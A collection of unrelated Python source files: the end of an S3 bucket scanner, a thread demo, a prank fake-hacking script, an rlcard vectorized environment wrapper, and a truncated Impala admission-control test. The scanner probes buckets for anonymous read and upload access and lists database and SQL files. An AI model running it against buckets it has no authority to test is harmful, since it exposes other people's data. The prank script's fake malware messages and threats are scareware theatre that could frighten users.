$ python BucketScanner.py -l bucket_list.txt -w upload_file.txt -r '^.*\.(db|sql)' -t 50 -m 5242880 -o output.txt
The above command will:
- test all buckets from bucket_list.txt file
- test if you can upload upload_file.txt to any of the bucket included in bucket_list.txt
- provide URLs in output.txt only to files bigger than 5 MB and with .db or .sql extension
- work on 50 threads
''')
def closing_words():
    """Print the final summary pointing the user at the output file."""
    print "That's all folks! \
All collectable files can be found in {0}.".format(settings._OUTPUT_FILE)
if __name__ == "__main__":
    # Parse the command line, configure the global Settings object, then fan
    # the bucket list out to a pool of daemon worker threads.
    parser = ArgumentParser()
    parser.add_argument("-l", dest="bucket_list", required=True,
                        help="a list with bucket names.")
    parser.add_argument("-w", dest="write", type=str, required=False,
                        default="", help="file to execute upload test.")
    parser.add_argument("-r", dest="regex", required=False,
                        default='', help="regular expression filter")
    parser.add_argument("-s", dest="min", type=int, required=False, default=1,
                        help="minimum size.")
    parser.add_argument("-m", dest="max", type=int, required=False, default=0,
                        help="maximum size.")
    parser.add_argument("-t", dest="threads", type=int, required=False,
                        default=10, help="thread count.")
    parser.add_argument("-o", dest="output", type=str, required=False,
                        default="output.txt", help="output file.")
    if len(sys.argv) == 1:
        print_help()
        sys.exit()
    settings = Settings()
    arguments = parser.parse_args()
    # Bug fix: 'is not' compares object identity, which is unreliable for
    # strings; compare values with '!='.
    if arguments.output != "output.txt":
        settings.set_output_file(arguments.output)
    if arguments.write:
        settings.set_write_test(arguments.write)
    if arguments.regex:
        settings.set_regex(arguments.regex)
    if arguments.min > 1:
        settings.set_minsize(arguments.min)
    if arguments.max > 1:
        settings.set_maxsize(arguments.max)
    if not (AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY):
        settings.set_anonymous_mode()
    # Bug fix: removed a redundant second parser.parse_args() call.
    for i in range(0, arguments.threads):
        t = Thread(target=bucket_worker)
        t.daemon = True
        t.start()
    with open(arguments.bucket_list, 'r') as f:
        for bucket in f:
            queue.put(bucket.rstrip())
    queue.join()
    closing_words()
|
daemon.py | ''' working threads vs daemon thread '''
import threading
import time
# Daemons are only useful when the main program is running,
# and it's okay to kill them off once the other non-daemon
# threads have exited. Without daemon threads, we have to
# keep track of them, and tell them to exit, before our
# program can completely quit. By setting them as daemon
# threads, we can let them run and forget about them, and
# when our program quits, any daemon threads are killed
# automatically.
def daemon():
    '''
    @brief simulates a repetitive background job: prints 'daemon' once per
           second, forever (only stops when the process exits, because the
           thread running it is marked as a daemon)
    '''
    while True:
        time.sleep(1)
        print('daemon')
def worker(worker_name, timing):
    '''
    @brief prints *worker_name* 100 times, pausing *timing* seconds between
           prints (a finite, non-daemon workload)
    '''
    remaining = 100
    while remaining > 0:
        print(worker_name)
        time.sleep(timing)
        remaining -= 1
if __name__ == '__main__':
    # Bug fix: Thread.setDaemon() is deprecated (removed in Python 3.13);
    # pass daemon=True to the constructor instead. The daemon thread is
    # killed automatically once both workers finish and the program exits.
    DAE = threading.Thread(target=daemon, daemon=True)
    DAE.start()
    TH1 = threading.Thread(target=worker, args=('TH1', 0.1,))
    TH2 = threading.Thread(target=worker, args=('TH2', 0.2,))
    TH1.start()
    TH2.start()
|
src.py | import sys
import os
import colorama
import string
from threading import Thread
from time import sleep
from random import uniform, choice, randrange
file = [".cobalt",".py", ".c", ".exe", ".cpp", ".cs", ".js", ".go", ".dll", ".virus", ".trojan", ".txt", ".malware", ".fake"]
def do_color(text):
    """Print *text* in green via a raw ANSI escape sequence."""
    colored = "\x1b[0;32;40m" + text + "\x1b[0m"
    print(colored)
def do_red(text):
    """Print *text* in red via a raw ANSI escape sequence."""
    colored = "\x1b[0;31;40m" + text + "\x1b[0m"
    print(colored)
def startProgress(title):
    """Draw an empty 40-character progress bar labelled *title*, move the
    cursor back inside the brackets, and reset the global fill counter."""
    global progress_x
    header = "\x1b[0;34;40m" + title + ": [" + "-" * 40 + "]" + chr(8) * 41 + "\x1b[0m"
    sys.stdout.write(header)
    sys.stdout.flush()
    progress_x = 0
def progress(x):
    """Advance the bar to *x* percent by emitting only the missing '#' marks
    (progress_x, set by startProgress, remembers how many were drawn)."""
    global progress_x
    filled = int(x * 40 // 100)
    sys.stdout.write("\x1b[0;31;40m" + "#" * (filled - progress_x) + "\x1b[0m")
    sys.stdout.flush()
    progress_x = filled
def endProgress():
    """Fill whatever remains of the 40-character bar and close the bracket."""
    remainder = "#" * (40 - progress_x)
    sys.stdout.write(remainder + "\x1b[0;34;40m" + "]\n" + "\x1b[0m")
    sys.stdout.flush()
colorama.init()
def noInterrupt():
    """Run the whole fake-'hacking' show: progress bars, random file-name
    spam, an interactive fake-password prompt, then an endless 'revenge'
    loop.

    Never returns (the final while loop is infinite); it runs on a worker
    thread and stops only when the process is killed.
    """
    startProgress("Copying Malware To Bank of America Servers")
    for i in range(101):
        progress(i)
        sleep(uniform(0, 0.07))
    endProgress()
    do_color("Done.")
    startProgress("Activating Viruses")
    for i in range(101):
        progress(i)
        sleep(uniform(0, 0.001))
    endProgress()
    do_color("Done.")
    print("Making Credit Card Files..")
    sleep(1)
    # Spam 6000 random 50-char "file names" in random ANSI colors.
    for i in range(6000):
        text = ''.join(choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(50)) + choice(file)
        print("\x1b[{};{};{}m".format(randrange(0, 8), randrange(31, 38), randrange(40, 48)) + text + "\x1b[0m")
    do_color("\nDone.")
    # Interactive loop: print fake credentials until the user enters "n".
    while True:
        amount = input("How many passwords do you want to see (Enter n to leave): ")
        if amount == "n":
            break
        for i in range(int(amount)):
            text = ''.join(choice(string.digits) for _ in range(12))
            password = ''.join(choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(randrange(10, 40)))
            print("Credit Card Number: " + text + "; " + "Password: " + password)
    do_red("you left!!!! how dare you")
    sleep(0.5)
    do_red("I will destroy your computer")
    sleep(0.5)
    startProgress("Copying Malware To {}".format(os.getlogin()))
    for i in range(101):
        progress(i)
        sleep(uniform(0, 0.001))
    endProgress()
    # Endless colored word spam; this loop never exits.
    while True:
        text = choice(["virus", "trojan", "fake", "no", "dumb"])
        print("\x1b[{};{};{}m".format(randrange(0, 8), randrange(31, 38), randrange(40, 48)) + text + "\x1b[0m")
# Run the show on a worker thread; join() then blocks the main thread forever
# (noInterrupt never returns), keeping the script alive until it is killed.
a = Thread(target=noInterrupt)
a.start()
a.join()
|
vec_env.py | '''
A wrapper for running multiple environments with multiple processes
Reference: https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
'''
import multiprocessing as mp
from rlcard.utils import reorganize
class VecEnv(object):
    '''
    The wrapper for a vector of environments. Here, only the
    basic interfaces of `env` are implemented. The vec environment
    does not support going backward in the game tree.
    '''
    def __init__(self, env_id, config):
        ''' Initialize the VecEnv class

        Args:
            env_id (string): The id of the environment, e.g., 'blackjack'
            config (dict): The same as the config in Env; must contain
                'env_num' (number of parallel environments) and 'seed'
        '''
        # Number of parallel worker environments.
        self.num = config['env_num']

        # For multiprocessing. 'spawn' starts fresh interpreters, so the
        # workers do not inherit parent state.
        ctx = mp.get_context('spawn')
        # One pipe per environment: remotes stay in the parent,
        # work_remotes go to the workers.
        self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.num)])
        self.ps = [ctx.Process(target=worker, args=(work_remote, remote, env_id, config))
                for (work_remote, remote) in zip(self.work_remotes, self.remotes)]
        for p in self.ps:
            p.daemon = True # if the main process crashes, we should not cause things to hang
            p.start()
        # Close the parent's copies of the worker-side pipe ends so EOF
        # propagates correctly when a worker dies.
        for remote in self.work_remotes:
            remote.close()

        # A counter for the timesteps
        self.timestep = 0

        # Get the number of players/actions/state_shape in this game
        self.remotes[0].send(('info', None))
        self.player_num, self.action_num, self.state_shape = self.remotes[0].recv()

        self._seed(config['seed'])

    def set_agents(self, agents):
        # One agent per player; indexed by player_id in run().
        self.agents = agents

    def run(self, is_training=False):
        ''' Run X complete games, where X is the number of environemnts.
        The input/output are similar to Env. The difference is that
        The transitions for each player are stacked over the environments

        Args:
            is_training (boolean): True calls agent.step() (exploratory),
                False calls agent.eval_step()

        Returns:
            (tuple): per-player trajectories (reorganized with payoffs),
                and the list of payoffs per environment
        '''
        # trajectories[env][player] accumulates states/actions for the
        # environments still in flight; ready_trajectories keeps finished
        # ones at their original index via 'mapping'.
        trajectories = [[[] for _ in range(self.player_num)] for _ in range(self.num)]
        ready_trajectories = [None for _ in range(self.num)]
        active_remotes = [remote for remote in self.remotes]
        mapping = [i for i in range(self.num)]
        active_num = self.num

        # Reset
        states = []
        player_ids = []
        for state, player_id in send_command_to_all(active_remotes, ('reset', None)):
            states.append(state)
            player_ids.append(player_id)
        for i in range(active_num):
            trajectories[i][player_ids[i]].append(states[i])

        # Loop until all the environments are over
        while active_num > 0:
            # Agent playes
            # TODO: Currently we naively feed one obs to the agent. This can be improved via batch
            commands = []
            actions = []
            for i in range(active_num):
                opt = 'raw_step' if self.agents[player_ids[i]].use_raw else 'step'
                if not is_training:
                    action, _ = self.agents[player_ids[i]].eval_step(states[i])
                else:
                    action = self.agents[player_ids[i]].step(states[i])
                commands.append((opt, action))
                actions.append(action)

            # Environment steps
            next_states, next_player_ids, dones = [], [], []
            for next_state, next_player_id, done in send_commands_to_all(active_remotes, commands):
                next_states.append(next_state)
                next_player_ids.append(next_player_id)
                dones.append(done)

            # Save action
            for i in range(active_num):
                trajectories[i][player_ids[i]].append(actions[i])

            # Set the state and player
            states = next_states
            player_ids = next_player_ids

            # Save state
            finished = []
            for i in range(active_num):
                if dones[i]:
                    # Add a final state to all the players
                    for j in range(self.player_num):
                        active_remotes[i].send(('get_state', j))
                        trajectories[i][j].append(active_remotes[i].recv())

                    # Save the ready trajectories and mark them as finished
                    ready_trajectories[mapping[i]] = trajectories[i]
                    finished.append(i)
                else:
                    trajectories[i][player_ids[i]].append(states[i])

            # Pop out the finished ones
            trajectories = [trajectories[i] for i in range(active_num) if i not in finished]
            mapping = [mapping[i] for i in range(active_num) if i not in finished]
            active_remotes = [active_remotes[i] for i in range(active_num) if i not in finished]
            states = [states[i] for i in range(active_num) if i not in finished]
            player_ids = [player_ids[i] for i in range(active_num) if i not in finished]
            self.timestep += active_num
            active_num -= len(finished)

        # Payoffs (queried from every environment; all have finished by now)
        payoffs = send_command_to_all(self.remotes, ('get_payoffs', None))
        for i in range(self.num):
            ready_trajectories[i] = reorganize(ready_trajectories[i], payoffs[i])
        # Flatten: stack each player's transitions across the environments.
        trajectories = [[] for _ in range(self.player_num)]
        for trs in ready_trajectories:
            for i in range(self.player_num):
                trajectories[i].extend(trs[i])

        return trajectories, payoffs

    def _seed(self, seed=None):
        # Offset each environment's seed by i*1000 so they play different games.
        seeds = [None for _ in range(self.num)]
        if seed is not None:
            commands = [('seed', seed+i*1000) for i in range(self.num)]
            seeds = send_commands_to_all(self.remotes, commands)
        return seeds
def send_commands_to_all(remotes, commands):
    """Send commands[i] to remotes[i], then collect one reply per remote.

    All sends are issued before any recv so the workers execute in parallel.
    Replies are returned in remote order.
    """
    for remote, command in zip(remotes, commands):
        remote.send(command)
    return [remote.recv() for remote in remotes]
def send_command_to_all(remotes, command):
    """Broadcast the same *command* to every remote, then collect one reply
    per remote, in remote order (sends complete before the first recv)."""
    for remote in remotes:
        remote.send(command)
    return [remote.recv() for remote in remotes]
def worker(remote, parent_remote, env_id, config):
    """Subprocess entry point: build one environment and serve commands.

    Receives (cmd, data) tuples over *remote* and replies with the command's
    result, until 'close' is received or the parent dies. *parent_remote* is
    the parent's pipe end, closed here so only the parent holds it.
    """
    def step_env(env, action, use_raw):
        # One environment step; done is derived so the parent can drop
        # finished environments without an extra round-trip.
        state, player_id = env.step(action, use_raw)
        done = env.is_over()
        return state, player_id, done

    # Imported here (not at module top) because this runs in a freshly
    # spawned process.
    from rlcard.envs.registration import registry
    env = registry.make(env_id, config)
    parent_remote.close()
    try:
        while True:
            cmd, data = remote.recv()
            if cmd == 'reset':
                remote.send(env.reset())
            elif cmd == 'step_raw':
                remote.send(step_env(env, data, True))
            elif cmd == 'step':
                remote.send(step_env(env, data, False))
            elif cmd == 'seed':
                remote.send(env._seed(data))
            elif cmd == 'get_state':
                remote.send(env.get_state(data))
            elif cmd == 'get_payoffs':
                remote.send(env.get_payoffs())
            elif cmd == 'info':
                remote.send((env.player_num, env.action_num, env.state_shape))
            elif cmd == 'close':
                remote.close()
                break
            else:
                raise NotImplementedError
    except KeyboardInterrupt:
        print('SubprocVecEnv worker: got KeyboardInterrupt')
    finally:
        del env
|
test_admission_controller.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests admission control
import itertools
import logging
import os
import pytest
import re
import shutil
import sys
import threading
from copy import copy
from time import sleep, time
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.resource_pool_config import ResourcePoolConfig
from tests.common.skip import (
SkipIfS3,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfNotHdfsMinicluster,
SkipIfOS)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_vector import ImpalaTestDimension
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
from tests.util.web_pages_util import (
get_num_completed_backends,
get_mem_admitted_backends_debug_page)
from tests.verifiers.mem_usage_verifier import MemUsageVerifier
from tests.verifiers.metric_verifier import MetricVerifier
from ImpalaService import ImpalaHiveServer2Service
from TCLIService import TCLIService
# Module-level logger and tuning constants shared by all the admission tests.
LOG = logging.getLogger('admission_test')

# The query used for testing. It is important that this query returns many rows
# while keeping fragments active on all backends. This allows a thread to keep
# the query active and consuming resources by fetching one row at a time. The
# where clause is for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30)

# The statestore heartbeat and topic update frequency (ms). Set low for testing.
STATESTORE_RPC_FREQUENCY_MS = 100

# Time to sleep (in milliseconds) between issuing queries. When the delay is at least
# the statestore heartbeat frequency, all state should be visible by every impalad by
# the time the next query is submitted. Otherwise the different impalads will see stale
# state for some admission decisions.
SUBMISSION_DELAY_MS = \
    [0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2]

# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
NUM_QUERIES = [15, 30, 50]

# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]

# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"

# Stress test timeout (seconds). The timeout needs to be significantly higher for
# slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241).
STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600)

# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5

# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10

# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024

# Flags passed to the statestore in every custom-cluster test below.
_STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} "
                     "-statestore_priority_update_frequency_ms={freq_ms}").format(
  freq_ms=STATESTORE_RPC_FREQUENCY_MS)

# Name of the subscriber metric tracking the admission control update interval.
REQUEST_QUEUE_UPDATE_INTERVAL =\
    'statestore-subscriber.topic-impala-request-queue.update-interval'

# Key in the query profile for the query options.
PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): "

# The different ways that a query thread can end its query.
QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE']

# The timeout used for the QUERY_TIMEOUT end behaviour
QUERY_END_TIMEOUT_S = 1

# Value used for --admission_control_stale_topic_threshold_ms in tests.
STALE_TOPIC_THRESHOLD_MS = 500

# Regex that matches the first part of the profile info string added when a query is
# queued.
INITIAL_QUEUE_REASON_REGEX = \
    "Initial admission queue reason: waited [0-9]* ms, reason: .*"

# The path to resources directory which contains the admission control config files.
RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources")
def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem,
                                 proc_mem_limit=None, queue_wait_timeout_ms=None,
                                 admission_control_slots=None, executor_groups=None):
  """Build the impalad startup flags configuring default-pool admission control.

  Each optional keyword argument appends its corresponding flag only when it
  is not None; the returned string is passed as impalad_args.
  """
  optional_flags = [
      ("-mem_limit={0}", proc_mem_limit),
      ("-queue_wait_timeout_ms={0}", queue_wait_timeout_ms),
      ("-admission_control_slots={0}", admission_control_slots),
      ("-executor_groups={0}", executor_groups),
  ]
  extra_flags = "".join(" " + template.format(value)
                        for template, value in optional_flags if value is not None)
  return ("-vmodule admission-controller=3 -default_pool_max_requests {0} "
          "-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format(
            max_requests, max_queued, pool_max_mem, extra_flags))
def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file,
                                       additional_args="", make_copy=False):
  """Build impalad flags pointing at the given admission-control config files.

  File names are resolved relative to RESOURCES_DIR. When make_copy is True
  the files are first duplicated (with a "copy-" prefix) so a test can mutate
  them without touching the originals.
  """
  fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file)
  llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file)
  if make_copy:
    fs_copy = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file)
    llama_copy = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file)
    shutil.copy2(fs_allocation_path, fs_copy)
    shutil.copy2(llama_site_path, llama_copy)
    fs_allocation_path = fs_copy
    llama_site_path = llama_copy
  return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
          "-llama_site_path %s %s" % (fs_allocation_path, llama_site_path,
                                      additional_args))
def log_metrics(log_prefix, metrics):
  """Log a one-line summary of the admission-controller metrics in *metrics*,
  prefixed with *log_prefix*."""
  LOG.info(
      "%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "
      "released=%s, timed-out=%s",
      log_prefix, metrics['admitted'], metrics['queued'], metrics['dequeued'],
      metrics['rejected'], metrics['released'], metrics['timed-out'])
def compute_metric_deltas(m2, m1):
  """Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1),
  keyed by the metric names present in m2."""
  return {name: m2.get(name, 0) - m1.get(name, 0) for name in m2}
def metric_key(pool_name, metric_name):
  """Helper method to construct the admission controller metric keys
  ("admission-controller.<metric>.<pool>")."""
  return "admission-controller.{0}.{1}".format(metric_name, pool_name)
class TestAdmissionControllerBase(CustomClusterTestSuite):
  """Common workload/test-dimension setup shared by the admission-controller
  test suites."""

  @classmethod
  def get_workload(self):
    # NOTE(review): the parameter is conventionally named 'cls' for a
    # classmethod.
    return 'functional-query'

  @classmethod
  def add_test_dimensions(cls):
    super(TestAdmissionControllerBase, cls).add_test_dimensions()
    # Run with a single exec-option combination; admission behavior does not
    # depend on the exec-option matrix.
    cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
    # There's no reason to test this on other file formats/compression codecs right now
    cls.ImpalaTestMatrix.add_dimension(
        create_uncompressed_text_dimension(cls.get_workload()))
class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite):
  def __check_pool_rejected(self, client, pool, expected_error_re):
    """Run 'select 1' in *pool* via *client* and assert that admission control
    rejects it with an error matching *expected_error_re*."""
    try:
      client.set_configuration({'request_pool': pool})
      client.execute("select 1")
      assert False, "Query should return error"
    except ImpalaBeeswaxException as e:
      assert re.search(expected_error_re, str(e))
def __check_query_options(self, profile, expected_query_options):
"""Validate that the expected per-pool query options were set on the specified
profile. expected_query_options is a list of "KEY=VALUE" strings, e.g.
["MEM_LIMIT=1", ...]"""
confs = []
for line in profile.split("\n"):
if PROFILE_QUERY_OPTIONS_KEY in line:
rhs = re.split(": ", line)[1]
confs = re.split(",", rhs)
break
expected_set = set([x.lower() for x in expected_query_options])
confs_set = set([x.lower() for x in confs])
assert expected_set.issubset(confs_set)
  def __check_hs2_query_opts(self, pool_name, mem_limit=None, expected_options=None):
    """ Submits a query via HS2 (optionally with a mem_limit in the confOverlay)
    into pool_name and checks that the expected_query_options are set in the
    profile."""
    # Submit "select 1" into the requested pool.
    execute_statement_req = TCLIService.TExecuteStatementReq()
    execute_statement_req.sessionHandle = self.session_handle
    execute_statement_req.confOverlay = {'request_pool': pool_name}
    if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit
    execute_statement_req.statement = "select 1"
    execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
    HS2TestSuite.check_response(execute_statement_resp)

    # Fetch the single result row so the query completes.
    fetch_results_req = TCLIService.TFetchResultsReq()
    fetch_results_req.operationHandle = execute_statement_resp.operationHandle
    fetch_results_req.maxRows = 1
    fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req)
    HS2TestSuite.check_response(fetch_results_resp)

    close_operation_req = TCLIService.TCloseOperationReq()
    close_operation_req.operationHandle = execute_statement_resp.operationHandle
    HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req))

    # The runtime profile remains retrievable after close; verify the
    # effective query options recorded in it.
    get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq()
    get_profile_req.operationHandle = execute_statement_resp.operationHandle
    get_profile_req.sessionHandle = self.session_handle
    get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req)
    HS2TestSuite.check_response(get_profile_resp)
    self.__check_query_options(get_profile_resp.profile, expected_options)
def _execute_and_collect_profiles(self, queries, timeout_s, config_options={},
allow_query_failure=False):
"""Submit the query statements in 'queries' in parallel to the first impalad in
the cluster. After submission, the results are fetched from the queries in
sequence and their profiles are collected. Wait for up to timeout_s for
each query to finish. If 'allow_query_failure' is True, succeeds if the query
completes successfully or ends up in the EXCEPTION state. Otherwise expects the
queries to complete successfully.
Returns the profile strings."""
client = self.cluster.impalads[0].service.create_beeswax_client()
expected_states = [client.QUERY_STATES['FINISHED']]
if allow_query_failure:
expected_states.append(client.QUERY_STATES['EXCEPTION'])
try:
handles = []
profiles = []
client.set_configuration(config_options)
for query in queries:
handles.append(client.execute_async(query))
for query, handle in zip(queries, handles):
state = self.wait_for_any_state(handle, expected_states, timeout_s)
if state == client.QUERY_STATES['FINISHED']:
self.client.fetch(query, handle)
profiles.append(self.client.get_runtime_profile(handle))
return profiles
finally:
client.close()
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="fair-scheduler-test2.xml",
        llama_site_file="llama-site-test2.xml"),
      default_query_options=[('mem_limit', 200000000)],
      statestored_args=_STATESTORED_ARGS)
  @needs_session(conf_overlay={'batch_size': '100'})
  def test_set_request_pool(self):
    """Tests setting the REQUEST_POOL with the pool placement policy configured
    to require a specific pool, and validate that the per-pool configurations were
    applied."""
    impalad = self.cluster.impalads[0]
    client = impalad.service.create_beeswax_client()
    # Expected default mem limit for queueA, used in several tests below
    queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024)
    try:
      # Unmapped pool names must be rejected outright.
      for pool in ['', 'not_a_pool_name']:
        expected_error =\
            "No mapping found for request from user '\S+' with requested pool '%s'"\
            % (pool)
        self.__check_pool_rejected(client, pool, expected_error)

      # Check rejected if user does not have access.
      expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\
          "denied access to assigned pool 'root.queueC'"
      self.__check_pool_rejected(client, 'root.queueC', expected_error)

      # Also try setting a valid pool
      client.set_configuration({'request_pool': 'root.queueB'})
      result = client.execute("select 1")
      # Query should execute in queueB which doesn't have a default mem limit set in the
      # llama-site.xml, so it should inherit the value from the default process query
      # options.
      self.__check_query_options(result.runtime_profile,
          ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB'])

      # Try setting the pool for a queue with a very low queue timeout.
      # queueA allows only 1 running query and has a queue timeout of 50ms, so the
      # second concurrent query should time out quickly.
      client.set_configuration({'request_pool': 'root.queueA'})
      handle = client.execute_async("select sleep(1000)")
      self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout")
      assert client.get_state(handle) == client.QUERY_STATES['FINISHED']
      # queueA has default query options mem_limit=128m,query_timeout_s=5
      self.__check_query_options(client.get_runtime_profile(handle),
          [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA'])
      client.close_query(handle)

      # Should be able to set query options via the set command (overriding defaults if
      # applicable). mem_limit overrides the pool default. abort_on_error has no
      # proc/pool default.
      client.execute("set mem_limit=31337")
      client.execute("set abort_on_error=1")
      result = client.execute("select 1")
      self.__check_query_options(result.runtime_profile,
          ['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5',
           'REQUEST_POOL=root.queueA'])

      # Should be able to set query options (overriding defaults if applicable) with the
      # config overlay sent with the query RPC. mem_limit is a pool-level override and
      # max_io_buffers has no proc/pool default.
      client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'})
      result = client.execute("select 1")
      self.__check_query_options(result.runtime_profile,
          ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA',
           'ABORT_ON_ERROR=1'])

      # Once options are reset to their defaults, the queue
      # configuration should kick back in. We'll see the
      # queue-configured mem_limit, and we won't see
      # abort on error, because it's back to being the default.
      client.execute('set mem_limit=""')
      client.execute('set abort_on_error=""')
      client.set_configuration({'request_pool': 'root.queueA'})
      result = client.execute("select 1")
      self.__check_query_options(result.runtime_profile,
          [queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5'])
    finally:
      client.close()

    # HS2 tests:
    # batch_size is set in the HS2 OpenSession() call via the requires_session() test
    # decorator, so that is included in all test cases below.
    batch_size = "BATCH_SIZE=100"

    # Check HS2 query in queueA gets the correct query options for the pool.
    self.__check_hs2_query_opts("root.queueA", None,
        [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
    # Check overriding the mem limit sent in the confOverlay with the query.
    self.__check_hs2_query_opts("root.queueA", '12345',
        ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
    # Check HS2 query in queueB gets the process-wide default query options
    self.__check_hs2_query_opts("root.queueB", None,
        ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size])
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="fair-scheduler-test2.xml",
        llama_site_file="llama-site-test2.xml",
        additional_args="-require_username"),
      statestored_args=_STATESTORED_ARGS)
  def test_require_user(self):
    """With -require_username set, a query submitted on a session opened with
    an empty username must fail with a "User must be specified" error."""
    open_session_req = TCLIService.TOpenSessionReq()
    open_session_req.username = ""
    open_session_resp = self.hs2_client.OpenSession(open_session_req)
    TestAdmissionController.check_response(open_session_resp)
    try:
      execute_statement_req = TCLIService.TExecuteStatementReq()
      execute_statement_req.sessionHandle = open_session_resp.sessionHandle
      execute_statement_req.statement = "select count(1) from functional.alltypes"
      execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
      # The query is admitted asynchronously; wait for it to reach the error
      # state before checking the message.
      self.wait_for_operation_state(execute_statement_resp.operationHandle,
          TCLIService.TOperationState.ERROR_STATE)
      get_operation_status_resp = self.get_operation_status(
          execute_statement_resp.operationHandle)
      assert "User must be specified" in get_operation_status_resp.errorMessage
    finally:
      close_req = TCLIService.TCloseSessionReq()
      close_req.sessionHandle = open_session_resp.sessionHandle
      TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_trivial_coord_query_limits(self):
"""Tests that trivial coordinator only queries have negligible resource requirements.
"""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Queries with only constant exprs or limit 0 should be admitted.
self.execute_query_expect_success(self.client, "select 1")
self.execute_query_expect_success(self.client,
"select * from functional.alltypes limit 0")
non_trivial_queries = [
"select * from functional.alltypesagg limit 1",
"select * from functional.alltypestiny"]
for query in non_trivial_queries:
ex = self.execute_query_expect_failure(self.client, query)
assert re.search("Rejected query from pool default-pool: request memory needed "
".* is greater than pool max mem resources 10.00 MB", str(ex))
@SkipIfS3.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
